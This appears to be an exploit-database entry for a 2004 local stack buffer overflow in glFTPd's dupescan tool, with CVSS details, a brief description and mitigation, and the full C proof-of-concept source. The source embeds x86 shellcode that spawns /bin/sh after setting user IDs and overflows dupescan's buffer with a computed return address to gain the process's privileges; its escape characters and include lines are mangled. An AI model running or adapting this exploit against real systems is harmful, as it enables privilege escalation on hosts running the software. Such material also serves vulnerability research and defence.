glFTPd local stack buffer overflow exploit

vendor:

glFTPd

by:

CoKi

7.5

CVSS

HIGH

Stack Buffer Overflow

119

CWE

Product Name: glFTPd

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Slackware 9.0, 9.1, and 10.0

2004

glFTPd local stack buffer overflow exploit

This is a proof of concept exploit for a local stack buffer overflow vulnerability in glFTPd. The exploit has been tested on Slackware 9.0, 9.1, and 10.0. It allows an attacker to execute arbitrary code with the privileges of the glFTPd process.

Mitigation:

The vendor should release a patch to fix the buffer overflow vulnerability. In the meantime, users should consider disabling or restricting access to the vulnerable function.

Source

Exploit-DB raw data:

/* glFTPd local stack buffer overflow exploit 
(Proof of Concept) 

Tested in Slackware 9.0 / 9.1 / 10.0 

by CoKi 
No System Group - http://www.nosystem.com.ar 
*/ 

#include <'stdio.h> 
#include <'strings.h> 
#include <'unistd.h> 

#define BUFFER 288 + 1 
#define PATH "/glftpd/bin/dupescan" 

char shellcode[]= 
"xb0x31xcdx80x89xc3x31xc0xb0x17xcdx80" 
"x31xdbx31xc0xb0x17xcdx80" 
"xebx1fx5ex89x76x08x31xc0x89x46x0cx88x46x07" 
"xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb" 
"x89xd8x40xcdx80xe8xdcxffxffxff/bin/sh"; 

int main(void) { 

char *env[3] = {shellcode, NULL}; 
char buf[BUFFER], *path; 
int *buffer = (int *) (buf); 
int i; 
int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH); 

for(i=0; i<=BUFFER; i+=4) 
*buffer++ = ret; 

printf(" glFTPd local stack buffer overflow (Proof of Concept) "); 
printf(" by CoKi "); 

execle(PATH, "dupescan", buf, NULL, env); 
} 


// milw0rm.com [2004-09-23]